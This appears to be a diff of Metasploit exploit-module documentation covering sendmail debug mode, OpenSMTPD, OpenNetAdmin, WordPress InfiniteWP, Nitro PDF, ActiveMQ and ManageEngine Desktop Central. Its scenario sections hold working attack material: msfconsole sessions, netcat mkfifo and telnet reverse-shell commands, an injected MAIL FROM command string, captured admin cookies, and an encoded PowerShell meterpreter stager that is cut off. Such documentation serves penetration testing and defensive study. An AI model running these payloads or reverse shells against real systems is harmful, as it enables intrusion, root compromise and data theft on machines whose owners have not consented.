+mda-user: nobody
+mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0
+
+[*] Disconnecting client 172.16.249.138:10203
+[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
+[*] Server stopped.
+
+id
+uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
+uname -a
+OpenBSD foo.localdomain 6.3 GENERIC#100 amd64
+```
@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits `sendmail`'s well-known historical debug mode to
 escape to a shell and execute commands in the SMTP `RCPT TO` command.
@@ -6,7 +8,7 @@ escape to a shell and execute commands in the SMTP `RCPT TO` command.
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -16,7 +18,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -24,6 +26,10 @@ Id  Name
 0   @(#)version.c       5.51 (Berkeley) 5/2/86
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **RPORT**
@@ -33,62 +39,66 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

 **PAYLOAD**

-Set this to a Unix command payload. Currently only `cmd/unix/reverse`
+Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
 and `cmd/unix/generic` are supported.

-## Usage
+## Scenarios
+
+### `sendmail` 5.51 on 4.3BSD

 ```
-msf5 exploit(unix/smtp/morris_sendmail_debug) > options
+msf5 > use exploit/unix/smtp/morris_sendmail_debug
+msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing

 Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   25               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


 Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)version.c       5.51 (Berkeley) 5/2/86
-
+   LHOST                   yes       The listen address (an interface may be specified)

+msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(unix/smtp/morris_sendmail_debug) > run

-[*] Started reverse TCP double handler on 192.168.1.5:4444
+[*] Started reverse TCP double handler on 192.168.56.1:4444
 [*] 127.0.0.1:25 - Connecting to sendmail
 [*] 127.0.0.1:25 - Enabling debug mode and sending exploit
+[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
 [*] 127.0.0.1:25 - Sending: DEBUG
-[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
+[*] 127.0.0.1:25 - Expecting: /200 Debug set/
+[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
+[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
 [*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
+[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
 [*] 127.0.0.1:25 - Sending: DATA
+[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
 [*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
 [*] 127.0.0.1:25 - Sending: export PATH
-[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
+[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
 [*] 127.0.0.1:25 - Sending: .
+[*] 127.0.0.1:25 - Expecting: /250 Ok/
 [*] 127.0.0.1:25 - Sending: QUIT
+[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
-[*] Command: echo zqhqKJD7trW0E0Lp;
+[*] Command: echo ISj759F8jEik4HAW;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
-[*] Reading from socket B
-[*] B: "zqhqKJD7trW0E0Lp\r\n"
+[*] Reading from socket A
+[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
 [*] Matching...
-[*] A is input...
-[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
+[*] B is input...
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
 [!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
 [!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a command injection in the `MAIL FROM` field during
+SMTP interaction with OpenSMTPD to execute a command as the root user.
+
+### Setup
+
+1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
+2. Install the system, noting the domain name (defaults to `foo.localdomain` in VMware)
+3. Configure the following settings in `/etc/mail/smtpd.conf`:
+  * `listen on all`
+  * `match from any for domain "foo.localdomain" action "local_mail"`
+4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
+5. Execute `ifconfig` and look for an appropriate target IP
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   OpenSMTPD < 6.6.1
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**RCPT_TO**
+
+Set this to a valid mail recipient. The default is `root`.
+
+## Scenarios
+
+### OpenSMTPD 6.6.0 on OpenBSD 6.6
+
+```
+msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing
+
+Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137
+rhosts => 172.16.249.137
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
+
+[+] mkfifo /tmp/twkfr; nc 172.16.249.1 4444 0</tmp/twkfr | /bin/sh >/tmp/twkfr 2>&1; rm /tmp/twkfr
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] 172.16.249.137:25 - Executing automatic check (disable AutoCheck to override)
+[!] 172.16.249.137:25 - The service is running, but could not be validated.
+[*] 172.16.249.137:25 - Connecting to OpenSMTPD
+[*] 172.16.249.137:25 - Saying hello and sending exploit
+[*] 172.16.249.137:25 - Expecting: /220.*OpenSMTPD/
+[+] 172.16.249.137:25 - Received: 220 foo.localdomain ESMTP OpenSMTPD
+[*] 172.16.249.137:25 - Sending: HELO JijrF2eskbXFfdlaV
+[*] 172.16.249.137:25 - Expecting: /250.*pleased to meet you/
+[+] 172.16.249.137:25 - Received:
+250 foo.localdomain Hello JijrF2eskbXFfdlaV [172.16.249.1], pleased to meet you
+[*] 172.16.249.137:25 - Sending: MAIL FROM:<;for W in a n 0 9 g D 7 N 7 B K R i u V;do read;done;sh;exit 0;>
+[*] 172.16.249.137:25 - Expecting: /250.*Ok/
+[+] 172.16.249.137:25 - Received:
+250 2.0.0 Ok
+[*] 172.16.249.137:25 - Sending: RCPT TO:<root>
+[*] 172.16.249.137:25 - Expecting: /250.*Recipient ok/
+[+] 172.16.249.137:25 - Received:
+250 2.1.5 Destination address valid: Recipient ok
+[*] 172.16.249.137:25 - Sending: DATA
+[*] 172.16.249.137:25 - Expecting: /354 Enter mail.*itself/
+[+] 172.16.249.137:25 - Received:
+354 Enter mail, end with "." on a line by itself
+[*] 172.16.249.137:25 - Sending:
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+mkfifo /tmp/rsnzh; nc 172.16.249.1 4444 0</tmp/rsnzh | /bin/sh >/tmp/rsnzh 2>&1; rm /tmp/rsnzh
+[*] 172.16.249.137:25 - Sending: .
+[*] 172.16.249.137:25 - Expecting: /250.*Message accepted for delivery/
+[+] 172.16.249.137:25 - Received:
+250 2.0.0 5bd4f87d Message accepted for delivery
+[*] 172.16.249.137:25 - Sending: QUIT
+[*] 172.16.249.137:25 - Expecting: /221.*Bye/
+[+] 172.16.249.137:25 - Received:
+221 2.0.0 Bye
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:28550) at 2020-02-28 10:28:14 -0600
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+```
@@ -6,15 +6,13 @@ This module exploits a command injection in Ajenti == 2.1.31. By injecting a com

 This module has been tested with [Ajenti 2.1.31](https://pypi.org/project/ajenti-panel/2.1.31/#files)

-## Setup
+### Setup

 1. `sudo pip install ajenti-panel==2.1.31 ajenti.plugin.dashboard ajenti.plugin.settings ajenti.plugin.plugins`
 2. `ajenti-panel -v`

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. `use exploit/unix/webapp/ajenti_auth_username_cmd_injection`
  2. `set RHOSTS <rhost>`
  3. `set LHOST <lhost>`
@@ -0,0 +1,52 @@
+## Description
+
+OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
+This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the `tooltips.inc.php` component, due to the insecure usage of the `shell_exec()` PHP function.
+
+## Vulnerable Application
+
+This module has been tested with [OpenNetAdmin 18.1.1](https://github.com/opennetadmin/ona/releases/tag/v18.1.1)
+
+## Setup
+
+https://github.com/opennetadmin/ona/wiki/Install
+
+## Verification
+
+Launch metasploit and set the appropiate options:
+>
+> * [ ]  Start `msfconsole`
+> * [ ]  `use exploit/unix/webapp/opennetadmin_ping_cmd_injection`
+> * [ ]  `set RHOSTS <rhosts>`
+> * [ ]  `set LHOST <lhost>`
+> * [ ]  `set VHOST <hostname>`
+> * [ ]  `exploit`
+
+## Options
+
+**VHOST**
+
+The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional.
+
+## Scenarios
+
+ Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64
+
+```
+msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection
+msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152
+RHOSTS => 172.16.172.152
+msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com
+VHOST => example.com
+msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1
+LHOST => 172.16.172.1
+msf5 exploit(opennetadmin_ping_cmd_injection) > exploit
+[*] Started reverse TCP handler on 172.16.172.1:4444
+[*] Exploiting...
+[*] Sending stage (3021284 bytes) to 172.16.172.152
+[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.152:38590) at 2019-12-10 02:38:52 +0300
+[*] Sending stage (3021284 bytes) to 172.16.172.152
+[*] Command Stager progress - 100.12% done (810/809 bytes)
+
+meterpreter >
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authentication bypass in the WordPress
+InfiniteWP Client plugin to log in as an administrator and execute
+arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.
+
+The module will attempt to retrieve the original `PLUGIN_FILE` contents
+and restore them after payload execution. If `VerifyContents` is set,
+which is the default setting, the module will check to see if the
+restored contents match the original.
+
+Note that a valid administrator username is required for this module.
+
+WordPress >= 4.9 is currently not supported due to a breaking WordPress
+API change. Tested against 4.8.3.
+
+### Setup
+
+1. Install WordPress 4.8.3 or older
+2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
+3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   InfiniteWP Client < 1.9.4.5
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**USERNAME**
+
+Set this to a known, valid administrator username. Authentication will
+be bypassed for this user.
+
+**PLUGIN_FILE**
+
+Set this to a plugin file to insert the payload into, relative to the
+plugins directory, which is normally `/wp-content/plugins`. The file
+must exist and be writable by the web user. It will be overwritten and
+later restored.
+
+**VerifyContents**
+
+Verify that the restored contents of `PLUGIN_FILE` match the original.
+This is the default setting.
+
+## Scenarios
+
+### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3
+
+```
+msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing
+
+Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
+rport => 8000
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] WordPress 4.8.3 is a supported target
+[*] Found version 1.9.4.4 in the custom file
+[+] The target appears to be vulnerable.
+[*] Bypassing auth for admin at http://127.0.0.1:8000/
+[+] Successfully obtained cookie for admin
+[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
+[+] Successfully logged in as admin
+[*] Retrieving original contents of /wp-content/plugins/index.php
+[+] Successfully retrieved original contents of /wp-content/plugins/index.php
+[*] Contents:
+<?php
+// Silence is golden.
+[*] Overwriting /wp-content/plugins/index.php with payload
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Successfully overwrote /wp-content/plugins/index.php with payload
+[*] Requesting payload at /wp-content/plugins/index.php
+[*] Restoring original contents of /wp-content/plugins/index.php
+[*] Sending stage (38288 bytes) to 192.168.56.1
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Current contents of /wp-content/plugins/index.php match original!
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : c7f8fbe7b083
+OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -16,8 +16,6 @@

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/unix/webapp/wp_mobile_detector_upload_execute```
@@ -60,4 +58,3 @@
  [+] Deleted ZWTgqwsiFL.php
  [*] Server stopped.
  ```
-
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.

 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
+PDF Reader version 11. The saveAs() Javascript API function allows for writing
+arbitrary files to the file system. Additionally, the launchURL() function allows
+an attacker to execute local files on the file system and bypass the security dialog
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/fileformat/nitro_reader_jsapi```
+  4. Do: ```set payload windows/meterpreter/reverse_tcp```
+  5. Do: ```set LHOST [IP]```
+  6. Do: ```run```
+  7. You should get a shell.
+ 
+## Options
+
+### FILENAME
+
+The file name to save the exploit pdf to.  Default is `msf.pdf`
+
+## Scenarios
+
+### Nitro Pro PDF Reader 11.0.3.173 on Windows XP
+
+```
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
+[*] Processing scripts/nitro.rc for ERB directives.
+resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
+resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (scripts/nitro.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/nitro.rc)> exploit
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 172.16.175.1:4444
+msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.100.4:8080/
+[*] Server started.
+[*] 192.168.100.4    nitro_reader_jsapi - Sending second stage payload
+[*] Sending stage (957487 bytes) to 172.16.175.232
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
+[+] Deleted C:/Windows/Temp/UOIr.hta
+
+msf exploit(nitro_reader_jsapi) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 2412 created.
+Channel 2 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\researcher\Desktop>
+```
@@ -1,6 +1,6 @@
 ## Introduction

-The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function. 
+The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function.
 This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
 on the target.

@@ -43,7 +43,7 @@ on the target.
  [*] Using URL: http://192.168.146.1:8080/default.hta
  [*] Server started.
  ```
-  
+
  Once the victim opens the file and clicks 'Enable Content' a session should spawn:

  ```
@@ -0,0 +1,70 @@
+## Introduction
+
+A directory traversal vulnerability was discovered in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows. The vulnerability, tracked as CVE-2015-1830, allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.
+
+Because vulnerable servers allow for directory traversal, they will accept HTTP PUT requests for `/fileserver/..\\admin\\` and process these as requests for `/admin/`. For the PUT request to succeed, credentials need to be provided.
+
+This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/<payload>.jsp` on the target in order to trigger the payload and obtain a shell. The module has been succesfully tested against ActiveMQ 5.11.1 on a Windows 7 machine.
+
+## Verification Steps
+
+1. Start msfconsole.
+2. Do: `use exploit/windows/http/apache_activemq_traversal_upload`.
+3. Do: `set RHOSTS [IP]`. This option is used to set the IP address of the remote system running Apache ActiveMQ.
+4. Do: `set PAYLOAD [payload]`. This option can be used to set the payload to use against the target. The default payload is `java/jsp_shell_reverse_tcp`.
+5. Do: `set LHOST [IP]`. This option is used to set the IP address of the local machine the payload should establish a connection with.
+6. Do: `exploit`.
+
+## Options
+
+1.  `PASSWORD`. The default setting is `admin`, which is the default password for the ActiveMQ administrator account.
+2.  `PATH`. This option is the traversal path. `/fileserver/..\admin\` by default.
+3.  `USERNAME`. The default setting is `admin`, which is the default ActiveMQ administrator account.
+
+## Scenarios
+
+```
+msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options
+
+Module options (exploit/windows/http/apache_activemq_traversal_upload):
+
+   Name       Current Setting        Required  Description
+   ----       ---------------        --------  -----------
+   PASSWORD   admin                  yes       Password to authenticate with
+   PATH       /fileserver/..\admin\  yes       Traversal path
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8161                   yes       The target port (TCP)
+   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                      yes       The base path to the web application
+   USERNAME   admin                  yes       Username to authenticate with
+   VHOST                             no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.1:4444 
+[*] Uploading payload...
+[*] Payload sent. Attempting to execute the payload.
+[*] Payload executed!
+[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
+```
+
+## References
+
+1. <https://www.cvedetails.com/cve/CVE-2015-1830/>
+2. <https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt>
@@ -0,0 +1,98 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java deserialization vulnerability in the
+`getChartImage()` method from the `FileStorage` class within ManageEngine
+Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.
+
+> The short-term fix for the arbitrary file upload vulnerability was
+> released in build 10.0.474 on January 20, 2020. In continuation of that,
+> the complete fix for the remote code execution vulnerability is now
+> available in build 10.0.479.
+
+### Setup
+
+1. Download a vulnerable installer (I used 10.0.465 x64)
+2. Install the software in Windows (I used Windows 10)
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   Windows Command
+1   Windows Dropper
+2   PowerShell Stager
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**WfsDelay**
+
+If the target is slow to shell, increase this value. The default is 60
+seconds, on a fresh install and calibrated to my test environment.
+
+## Scenarios
+
+### Desktop Central 10.0.465 x64 on Windows 10
+
+```
+msf5 > use exploit/windows/http/desktopcentral_deserialization
+msf5 exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/http/desktopcentral_deserialization) > show missing
+
+Module options (exploit/windows/http/desktopcentral_deserialization):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139
+rhosts => 172.16.249.139
+msf5 exploit(windows/http/desktopcentral_deserialization) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(windows/http/desktopcentral_deserialization) > run
+
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Detected Desktop Central version 100465
+[+] The target appears to be vulnerable. 100465 is an exploitable version
+[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
+[*] Powershell command length: 2502
+[*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAImual4CA7VWa2+bSBT9nEj5D6iyBCiOjV0nTSNV2gFDjGu7psSP2GutCAww8QAuDLFJt/9979iQptt0t11pERLzuM9zz8zFz2OXkSQWEuuy/Ub4fHJ8NHZSJxKk2pr6al4XarkiHx3Beu1+aAbCO0Faos2mm0QOiVdXV1qepjhmh3njGjOUZTi6owRnkiz8KcxCnOKzD3f32GXCZ6H2R+OaJncOLcUKzXFDLJyh2ON7g8R1eDgNe0MJk8Tffxfl5Vlr1dA/5Q7NJNEuMoajhkepKAtfZO7wpthgSRwSN02yxGeNGYlftxuTOHN8PAJrD3iIWZh4mShDFvCmmOVpLOzz4QYO25IIw3GauMjzUpxlYl1YctPL1eo3aVn6/ZjHjES4YcYMp8nGxukDcXHW6DmxR/FH7K9Ay2YpiYOVLIPYQ7LGUi3OKa0Lv2JGGuFthdrPKknPlUBqzFK5DoV8Ic9h4uUUHzTFFwI9FF+G50AAQO7LyfHJsV/RxX2rec/ZAqOj5X6MITppnGRkL/dOUOrCEPw4LEkLmNZu0hzLqydshVrkTOs/Vm9VslyyVzzC0nKaEG8FKmU9a87FoMvXf8zLLvZJjLtF7ETEragnvQQy9inep9ioxEYQlCSWG9jrYooDh3HYeK2/U9Mjwp501ZxQD6fIhUJlEBXUUP42mEMlJNGMhzgCiA5zIF/NB8LjSrokeVF553MQEjXqZFldGOdw4ty6YGOHYq8uoDgj5RbKWbIfil/DHeaUEdfJWGVuJVc4lv60JM5YmrtQNcj9xt5glziUQ1EXesTDamGToPIrvgiE5lAK5wAsPUAhYIUDYDPOhRRC5HWXGzZmZrShOAKR/ck3qBPAOS/JvueOE2BP/HuAFZkPzOVQVBg8Cw/qa9OE1YUpSRlcIBxWTqL/5P3ZzbGPQ0txWQipOh5LtWCc1LUd4nwsMdkjkDLI3kiTSHUyfNE53BHSq6ZOuufjbvKI4NGNj9ZUtSfThTn0+tQ2mX2rk8EkDE3SMgOYFxM9GDNl8/7mpte3uz2Udnehj8zM1HtqYbVU5PbIm2lfnUxAj2gD635nIk+Ngnlwq23NcTg3wZE2CMwAvqoZuqqyUAJVMbSBrYY6UVBgWz2r01qYzUuqkkfbtFFv9uTvyY/e6fTmuxs0GvZRaHzwjFbb2Ouvuf5ifT3o6vu5y+fWbaYTHfzoxq01DfFsulFnurGwphszON0G1nTQ7BihCusm2Q02dhOeVqv/EHuPQ3r5OIRwremiT/DCDHARIAsh+zam9t1WQ6rhpmr3HE2MCaytb8x4Z91thl5x22u+nQ4J3iTI0hEyKJzHCDnbbrM1S95b03Nroiu7YqLstvp9c6uT/nZdfifXFxdB0++Mm1PbjHtOqEK8Rb+zJv1T2AP6KLd+c8rx6+px8zGeU2estRJ612xNSPeNqpoE90dDl35SIWewcW7dJVrbDX2IyQwurWCexG1nDXZnAYLoID+os983QUfNKVlPTufcVn+rRP2d